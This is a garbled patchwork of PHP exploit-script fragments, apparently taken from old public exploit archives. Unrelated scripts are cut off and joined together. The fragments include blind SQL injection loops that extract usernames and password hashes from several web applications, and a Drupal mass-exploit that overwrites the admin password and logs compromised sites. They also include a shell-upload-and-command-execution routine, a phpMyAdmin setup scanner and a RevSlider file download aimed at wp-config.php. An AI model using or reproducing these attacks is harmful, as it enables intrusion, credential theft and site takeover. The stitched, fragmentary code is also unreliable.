function run($hostname, $path, $username) { $key = "abcdef0123456789"; $chr = 0; $pos = 1; echo "[+] Password: "******"\n\n"; }
function lengthcolumns($hostname, $path, $chs, $goodid) { echo "[+] username length: "; $exit = 0; $length = 0; $pos = 1; $chr = 0; while ($exit == 0) { $response = exploit($hostname, $path, $pos, $chr, $chs, $goodid); if (preg_match("/javascript:addToCart/i", $response)) { $exit = 1; $length = $pos; break; } else { $pos++; if ($pos > 20) { exit("Exploit failed"); } } } echo $length . "\n"; return $length; }
} else { $table = "wp_users"; } $host = $argv[1]; $spos = strpos($host, "http://"); if (!is_int($spos) && $spos == 0) { $host = "http://{$host}"; } $path = $argv[2]; $pageid = (int) $argv[3]; /* Detecting the version, if possible */ $version = file_get_contents($host . $path . 'wp-content/plugins/wp-e-commerce/readme.txt'); preg_match("/Stable tag: (.*)/", $version, $vmatch); if (!isset($vmatch[1])) { $version = "Not detectable\n"; } else { $version = $vmatch[1]; } echo "Version: " . $version . "\n"; /* End of version detecting */ /* Executing exploit */ preg_match('/[^.]+\\.[^.]+$/', $host, $hmatch); $host_name = str_replace('http://', '', $hmatch[0]); $tarray = array($table, 'wordpress_users', '_users', 'users', 'wpusers', 'wordpressusers', $host_name . '_users', str_replace('.', '', $host_name) . '_users', str_replace('.', '', $host_name) . 'users'); foreach ($tarray as $index => $val) { echo exploit($host, $path, $pageid, $val); } /* End of exploit */ } else { help(); }
if (preg_match("/EXPIERED/", $reply)) { return false; } else { return true; } } if ($argc != 4) { usage(); } $host = $argv[1]; $path = $argv[2]; $func = $argv[3]; $key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; //add a bigger char set if you can't get the username $pos = 1; $chr = 0; echo "[☢] Creds: "; while ($pos <= 32) { if (exploit($host, $path, $func, $pos, $key[$chr])) { echo $key[$chr]; $chr = 0; $pos++; } else { $chr++; } } echo "\n"; ?> # milw0rm.com [2009-01-26]
fclose($fp); if (preg_match("/\"#FFFFFF\"> em <\\/font>/", $reply)) { return false; } else { return true; } } if ($argc != 4) { usage(); } $hostname = $argv[1]; $path = $argv[2]; $username = $argv[3]; $key = "abcdef0123456789"; $pos = 1; $chr = 0; echo "[+] Password: "******"\n\n"; ?> # milw0rm.com [2009-01-22]
echo "<form method='POST' enctype='multipart/form-data'>\n <input type='file'name='file' />\n <input type='submit' value='drupal !' />\n</form>"; move_uploaded_file($filetmp, $filename); } error_reporting(0); if (isset($_POST['submit'])) { function exploit($url) { $post_data = "name[0;update users set name %3D 'AnonCoders' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in"; $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded\n", 'content' => $post_data)); $ctx = stream_context_create($params); $data = file_get_contents($url . '/user/login/', null, $ctx); if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data || stristr($data, 'FcUk Crap') && $data) { $fp = fopen("exploited.txt", 'a+'); fwrite($fp, "Exploitied User: AnonCoders Pass: admin =====> {$url}/user/login"); fwrite($fp, "\n"); fwrite($fp, "--------------------------------------------------------------------------------------------------"); fwrite($fp, "\n"); fclose($fp); echo "<font color='gold'><b>Success:<font color='red'> AnonCoders</font> Pass:<font color='red'> admin</font> =><a href='{$url}/user/login' target=_blank ><font color='green'> {$url}/user/login </font></a></font></b><br>"; } else { echo "<font color='red'><b>Failed => {$url}/user/login</font></b><br>"; } } $urls = explode("\n", $_POST['url']); foreach ($urls as $url) { $url = @trim($url); echo exploit($url); } } echo "<br />"; echo '<center><a href="exploited.txt">View Exploited Drupal Sites</a></cenrer>';
if (strlen(trim($x[1])) == 0) { return false; } else { return true; } } function usage() { echo "\n[+] phpMDJ <= 1.0.3 Blind SQL Injection Exploit" . "\n[+] Author: darkjoker" . "\n[+] Site : http://darkjoker.net23.net" . "\n[+] Usage : php xpl.php <hostname> <path> <username>" . "\n[+] Ex. : php xpl.php localhost /phpMDJ admin" . "\n\n"; exit; } if ($argc != 4) { usage(); } $hostname = $argv[1]; $path = $argv[2]; $user = $argv[3]; $key = "abcdef0123456789"; $pos = 1; $chr = 0; echo "[+] Password: "******"\n\n"; # milw0rm.com [2009-01-11]
error_reporting(0); set_time_limit(0); ini_set("max_execution_time", 0); ini_set("default_socket_timeout", 10); $url = $argv[1]; $cmd = $argv[2]; $url_parts = parse_url($url); $host = $url_parts['host']; $path = $url_parts['path']; if (isset($url_parts['port'])) { $port = $url_parts['port']; } else { $port = 80; } echo "[~] Uploading shell... "; exploit($host, $path, $port) ? print "OK\n" : die("Failed\n"); echo "[~] Executing command... "; $res = cmd($host, $path, $port, $cmd); if ($res) { printf("OK\n%'-65s\n%s%'-65s\n", '', $res, ''); } else { die("Failed"); } function exploit($host, $path, $port) { $ock = fsockopen(gethostbyname($host), $port); if (!$ock) { return false; } $data = "--------bndry31337\r\n"; $data .= "Content-Disposition: form-data; ";
function GetUser($hostname, $path, $c) { $tmp = array(); $exit = 0; while ($exit == 0) { $response = exploit($hostname, $path, 1, $c - 1, 2); if (preg_match("/\\'\\d(.*?)\\'/i", $response, $tmp)) { $exit = 1; return $tmp[1]; } else { return "Can't Get\r\n"; } } }
<?php # # Name : Galleristic v1.0 (index.php cat) Remote SQL Injection Exploit # Author : cOndemned # Note : works only when magic_quotes_gpc = off # Greetz : irk4z, GregStar, ZaBeaTy, Iwan, ElusiveN, doctor, Avantura ;* # function exploit($target, $v) { $injection = "/index.php?cat='-1+union+select+value+from+gallery_settings+where+id=" . $v . "/*"; $request = file($target . $injection); for ($i = 0; $i < count($request); $i++) { preg_match('/\'(.*)\'<\\/h2>/', $request[$i], $response); if (!empty($response[1])) { return $response[1] . '<br />'; } } } # Usage : Run in a browser as : http://[yourbox]/exploit.php?target=http://[targetbox]/[path]/ if (empty($_GET['target'])) { die('No target site specified!'); } else { for ($c = 1; $c < 3; $c++) { echo exploit($_GET['target'], $c); } } ?> # milw0rm.com [2008-05-07]
$met = $opts[m]; } if ($opts[o]) { $file = $opts[o]; } if ($opts[d]) { $dir = $opts[d]; } $cookies = ''; $delay = $min = $max = $mid = 0; $fld1 = $fld2 = ''; if (!$forum) { die("[X] You haven't specified any forum type!\n"); } echo "[+] Target: {$url} [{$forum}]\n\n"; exploit(); function exploit_gallery($f) { global $cookies, $url, $fld1, $fld2; $sql = get_sql($f); $str = "NULL," . $fld1 . "," . $fld2 . ",NULL,NULL"; $req = sprintf($sql, $str); $u = $url . "index.php?ind=gallery&op=edit_file&iden=" . urlencode($req); $html = Send($u, NULL, $cookies); if (strstr($html, "ERROR: Database error")) { die("[X] SQL Query Error.. probably wrong table prefix\n"); } else { if (strstr($html, "<title>Error</title>")) { die("[X] This method failed. Try something else\n"); } }
$album = $argv[3]; } else { credits(); } } $page = 'thumbnails.php?album=' . $album; $GLOBALS['album'] = $album; echo "[+] Valid album number: " . $album . "\n"; $GLOBALS['cookies'] = getCookie($firstReply); ### get cookie from host $prefix = getPrefix($GLOBALS['cookies']); ### get cookie prefix echo "[+] Cookie prefix: " . $prefix . "\n"; $GLOBALS['prefix'] = $prefix; $etalon = toPage(sendit($page, 'GET', $c_cookies)); ### number of images at etalon page $first_sql = '0) UNION SELECT ' . $album . ' AND 1=1/*'; ### FIRST sql query - let's make valid album to be invisible $first_cookie = toCookie($first_sql); if (check($first_cookie) == 0) { echo "exploit failed..."; credits(); } ### if album is still visible - site is unvulnerable exploit('name'); exploit('password'); credits(); ?> # milw0rm.com [2008-01-22]
function exploit_site($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 200); curl_setopt($ch, CURLOPT_URL, $url . "scripts/setup.php"); $result = curl_exec($ch); curl_close($ch); $ch2 = curl_init(); curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch2, CURLOPT_HEADER, 1); curl_setopt($ch2, CURLOPT_TIMEOUT, 200); curl_setopt($ch2, CURLOPT_URL, $url . "config/config.inc.php"); $result2 = curl_exec($ch2); curl_close($ch2); //print $url; if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) { print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln"; print "\n[+] Exploiting, wait sec..\n"; $Handlex = FOpen("pmaPWN.log", "a+"); FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln"); FWrite($Handlex, "\n[+] Exploiting, wait sec..\n"); FClose($Handlex); exploit($url); } else { $Handlex = FOpen("pmaPWN.log", "a+"); print "\n[-] Shit! no luck.. not vulnerable\n"; FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n"); FClose($Handlex); } }
<?php $target = $argv[1]; define('wp_file', "../wp-config.php"); define('wp_args', "?action=revslider_show_image&img="); define('wp_path', "/wp-admin/admin-ajax.php"); print "\n[!] Set target > {$target} \n\n"; $url = parseUrl($target); $init = curl_init($url); curl_setopt($init, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($init); $code = curl_getinfo($init, CURLINFO_HTTP_CODE); if ($code == 200) { exploit($data); } else { notVuln(); } function exploit($data) { $lines = split("\n", $data); $rest = array(); foreach ($lines as $line) { $data = split("DB_", $line); if (!empty($data[1])) { $rest[] = "(DB_" . $data[1] . "\n"; } } if (empty($rest)) { notVuln(); } else { print "\n[!] VULNERABLE!!!\n\n";
function lengthcolumns($hostname, $path, $chs) { echo "[+] username length: "; $exit = 0; $length = 0; $pos = 0; $chr = 0; while ($exit == 0) { if (exploit($hostname, $path, $pos, $chr, $chs)) { $exit = 1; $length = $pos; } else { $pos++; } } echo $length . "\n"; return $length; }